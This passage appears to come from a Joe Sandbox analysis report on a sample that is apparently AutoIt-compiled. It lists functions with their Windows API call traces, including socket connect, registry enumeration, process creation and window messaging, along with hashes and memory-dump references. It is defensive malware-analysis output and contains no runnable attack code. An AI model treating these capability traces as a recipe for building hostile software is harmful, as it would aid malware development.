                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2178440468-0
                                                                                                                    • Opcode ID: 492d1a852dc9285ff4d4e151ff5b3c5a317309b2ee6a3b90f81c0a744ada2b26
                                                                                                                    • Instruction ID: 847cec8e3c7b785e6590eb20dc18089addb8841704dda5e76c8863555cc0867c
                                                                                                                    • Opcode Fuzzy Hash: 492d1a852dc9285ff4d4e151ff5b3c5a317309b2ee6a3b90f81c0a744ada2b26
                                                                                                                    • Instruction Fuzzy Hash: D9311639B44150AFDB22CF18DCC6F593BE9FB4A724F1A8164F5058F2B1CB71A8409B51
                                                                                                                    Function 0030DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0030DB2E
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0030DB54
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0030DB57
                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 0030DB75
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0030DB7E
                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 0030DBA3
                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 0030DBB1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3761583154-0
                                                                                                                    • Opcode ID: 9f3af8a869f73f169b0656cb8af59a36eb479f69edd249d33af5db3796efe3df
                                                                                                                    • Instruction ID: 8245b86bbecf1b2088ce1d4a0b99dea1fb9448d5e37e29fed2f6dd9b495c8ee6
                                                                                                                    • Opcode Fuzzy Hash: 9f3af8a869f73f169b0656cb8af59a36eb479f69edd249d33af5db3796efe3df
                                                                                                                    • Instruction Fuzzy Hash: B3219236A01219AFDF11DFE9DC88CBB77ECEB09360F418525FA14DB2A0D6749C458B64
                                                                                                                    Function 00326173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00327D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00327DB6
                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 003261C6
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 003261D5
                                                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0032620E
                                                                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00326217
                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00326221
                                                                                                                    • closesocket.WSOCK32(00000000), ref: 0032624A
                                                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00326263
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 910771015-0
                                                                                                                    • Opcode ID: 66b7239fe83357f312da6234760189e49074df297f2f83ddf03ec10ef7749ff4
                                                                                                                    • Instruction ID: 953987f3ee2e8e3f1cb1fc9ab6192bd7f107a0dde1dc7dfe461e3ee094ad8105
                                                                                                                    • Opcode Fuzzy Hash: 66b7239fe83357f312da6234760189e49074df297f2f83ddf03ec10ef7749ff4
                                                                                                                    • Instruction Fuzzy Hash: BC319031600228AFDF11AF24DC86BBE77ACEF45750F054429F905AB291CB74AC54CBA1
                                                                                                                    Function 0030F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsnicmp
                                                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                    • API String ID: 1038674560-2734436370
                                                                                                                    • Opcode ID: 9c3472170677d31b45f9b742d9a41425744da208b2491ad046cbc5232a7700bb
                                                                                                                    • Instruction ID: 1af6642fd2acc2f5929afef6aa4830bb1e71309fa5ed7b87759b4e0d5fa178d7
                                                                                                                    • Opcode Fuzzy Hash: 9c3472170677d31b45f9b742d9a41425744da208b2491ad046cbc5232a7700bb
                                                                                                                    • Instruction Fuzzy Hash: D8219E722165116FD232E634EC22FB7B3DCDF55780F11403AF442869D1EB919D62C796
                                                                                                                    Function 0030DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0030DC09
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0030DC2F
                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0030DC32
                                                                                                                    • SysAllocString.OLEAUT32 ref: 0030DC53
                                                                                                                    • SysFreeString.OLEAUT32 ref: 0030DC5C
                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 0030DC76
                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 0030DC84
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3761583154-0
                                                                                                                    • Opcode ID: 0088a71d5ff037313782cdf5688e6521af2e740240e787a95e5b08a245710998
                                                                                                                    • Instruction ID: 78f1db75fa634ba665501de1bcf0035da0c645917567465ca4411d7541e8aa42
                                                                                                                    • Opcode Fuzzy Hash: 0088a71d5ff037313782cdf5688e6521af2e740240e787a95e5b08a245710998
                                                                                                                    • Instruction Fuzzy Hash: D2216D35605204AFEB15EBE9DC88DAB77ECEB08360F518126F914CB2A0DAB4DC41CB64
                                                                                                                    Function 003375CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002B1D73
                                                                                                                      • Part of subcall function 002B1D35: GetStockObject.GDI32(00000011), ref: 002B1D87
                                                                                                                      • Part of subcall function 002B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 002B1D91
                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00337632
                                                                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0033763F
                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0033764A
                                                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00337659
                                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00337665
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                    • String ID: Msctls_Progress32
                                                                                                                    • API String ID: 1025951953-3636473452
                                                                                                                    • Opcode ID: dc65a3d2bbb40e7e2de373d573dd7016b50cdc73b9ee8e9892ca5f848e6929f1
                                                                                                                    • Instruction ID: bceeedbca84776145e5ea08d12269b2b526c5c4321e96e04ca8b2805699e4ace
                                                                                                                    • Opcode Fuzzy Hash: dc65a3d2bbb40e7e2de373d573dd7016b50cdc73b9ee8e9892ca5f848e6929f1
                                                                                                                    • Instruction Fuzzy Hash: AB11B6B1110119BFEF158F64CC86EE77F5DEF08798F014115F604A6050C6729C21DBA4
                                                                                                                    Function 002D9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __init_pointers.LIBCMT ref: 002D9AE6
                                                                                                                      • Part of subcall function 002D3187: EncodePointer.KERNEL32(00000000), ref: 002D318A
                                                                                                                      • Part of subcall function 002D3187: __initp_misc_winsig.LIBCMT ref: 002D31A5
                                                                                                                      • Part of subcall function 002D3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 002D9EA0
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 002D9EB4
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 002D9EC7
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 002D9EDA
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 002D9EED
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 002D9F00
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 002D9F13
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 002D9F26
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 002D9F39
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 002D9F4C
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 002D9F5F
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 002D9F72
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 002D9F85
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 002D9F98
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 002D9FAB
                                                                                                                      • Part of subcall function 002D3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 002D9FBE
                                                                                                                    • __mtinitlocks.LIBCMT ref: 002D9AEB
                                                                                                                    • __mtterm.LIBCMT ref: 002D9AF4
                                                                                                                      • Part of subcall function 002D9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,002D9AF9,002D7CD0,0036A0B8,00000014), ref: 002D9C56
                                                                                                                      • Part of subcall function 002D9B5C: _free.LIBCMT ref: 002D9C5D
                                                                                                                      • Part of subcall function 002D9B5C: DeleteCriticalSection.KERNEL32(027,?,?,002D9AF9,002D7CD0,0036A0B8,00000014), ref: 002D9C7F
                                                                                                                    • __calloc_crt.LIBCMT ref: 002D9B19
                                                                                                                    • __initptd.LIBCMT ref: 002D9B3B
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 002D9B42
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3567560977-0
                                                                                                                    • Opcode ID: b3efb6c6a754f0b3523926d1cf7f7538931113fe92d9d06473bce5030a02c914
                                                                                                                    • Instruction ID: 5c869b9ecc5ba582dd1272276fa7f3487ff5a095b3adee59b2946c37d1eb77c2
                                                                                                                    • Opcode Fuzzy Hash: b3efb6c6a754f0b3523926d1cf7f7538931113fe92d9d06473bce5030a02c914
                                                                                                                    • Instruction Fuzzy Hash: B3F090335397126AE774BB74BC0365A26959F03B34F214A1BF464C53D2FF608CE149A0
                                                                                                                    Function 0033B635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0033B644
                                                                                                                    • _memset.LIBCMT ref: 0033B653
                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00376F20,00376F64), ref: 0033B682
                                                                                                                    • CloseHandle.KERNEL32 ref: 0033B694
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                                                                    • String ID: o7$do7
                                                                                                                    • API String ID: 3277943733-2183443977
                                                                                                                    • Opcode ID: 280c0ff112e93931a3df1478bea000a971d8b215022cc7de9334254071558e20
                                                                                                                    • Instruction ID: 629ed43e86449a46429ba9d8ea6ccf80e829e3f3ea77c67715455a99180cc479
                                                                                                                    • Opcode Fuzzy Hash: 280c0ff112e93931a3df1478bea000a971d8b215022cc7de9334254071558e20
                                                                                                                    • Instruction Fuzzy Hash: C3F05EB6540700BFE2223B61BC57FBB7A9CEB08395F004021FA0DE6192D7754C148BA8
                                                                                                                    Function 002D406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,002D3F85), ref: 002D4085
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 002D408C
                                                                                                                    • EncodePointer.KERNEL32(00000000), ref: 002D4097
                                                                                                                    • DecodePointer.KERNEL32(002D3F85), ref: 002D40B2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                                                    • API String ID: 3489934621-2819208100
                                                                                                                    • Opcode ID: 06f95632a42297f74dc345a78bd191c83987c73c3c3b00bfacc4d7738c79404a
                                                                                                                    • Instruction ID: b8e751ad6a6f29f4756ea4009de3898bc3d1fad8c4acac5c1b0362915006b696
                                                                                                                    • Opcode Fuzzy Hash: 06f95632a42297f74dc345a78bd191c83987c73c3c3b00bfacc4d7738c79404a
                                                                                                                    • Instruction Fuzzy Hash: 4AE09274A96201EFEB22BF61EC49B463BACB704743F904426F115E61A0CBB65644AA15
                                                                                                                    Function 003164B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$__itow__swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3253778849-0
                                                                                                                    • Opcode ID: 21c363d6d5c09a7a42dfc03ef52fd438f6cd54c5821b196d12bfcbf1ca2abfab
                                                                                                                    • Instruction ID: 42bf5323aabcbaf14dd3a42fd060b6ad0f9144fd20e0f75a2065286fafadc58b
                                                                                                                    • Opcode Fuzzy Hash: 21c363d6d5c09a7a42dfc03ef52fd438f6cd54c5821b196d12bfcbf1ca2abfab
                                                                                                                    • Instruction Fuzzy Hash: 0461AD3051425A9BCF06EFA0CC82EFE37A9AF49348F048519F9555B2A2DB34EDA5CF50
                                                                                                                    Function 003301E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                      • Part of subcall function 00330E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0032FDAD,?,?), ref: 00330E31
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003302BD
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003302FD
                                                                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00330320
                                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00330349
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0033038C
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00330399
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4046560759-0
                                                                                                                    • Opcode ID: 3b88a52410c8cef8c7a42e649534d79a2cf8cdde0c5768c8ed665d4208f34d6e
                                                                                                                    • Instruction ID: 2ef4be0ebf7db42fdba47af0efe322f87e01fdc314c2eeae102a756440e0b9b3
                                                                                                                    • Opcode Fuzzy Hash: 3b88a52410c8cef8c7a42e649534d79a2cf8cdde0c5768c8ed665d4208f34d6e
                                                                                                                    • Instruction Fuzzy Hash: AD515C31218200AFC709EF64C895EAFBBE9FF89314F44491DF5958B2A2DB31E915CB52
                                                                                                                    Function 00335799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetMenu.USER32(?), ref: 003357FB
                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00335832
                                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0033585A
                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 003358C9
                                                                                                                    • GetSubMenu.USER32(?,?), ref: 003358D7
                                                                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 00335928
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$CountMessagePostString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 650687236-0
                                                                                                                    • Opcode ID: 0017e12e3e7b553560db0ceba51c324af6573fade2c9fdbabb835d0ef2b5b7ae
                                                                                                                    • Instruction ID: e4f38b3d1ad419824cebb8534cf5916cea7a4ea32cce27a154d41f93747b5343
                                                                                                                    • Opcode Fuzzy Hash: 0017e12e3e7b553560db0ceba51c324af6573fade2c9fdbabb835d0ef2b5b7ae
                                                                                                                    • Instruction Fuzzy Hash: B7516D31E00615EFCF12DF64C885AAEB7B5EF48320F114069E841BB361CB70AE41CB90
                                                                                                                    Function 0030EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0030EF06
                                                                                                                    • VariantClear.OLEAUT32(00000013), ref: 0030EF78
                                                                                                                    • VariantClear.OLEAUT32(00000000), ref: 0030EFD3
                                                                                                                    • _memmove.LIBCMT ref: 0030EFFD
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0030F04A
                                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0030F078
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
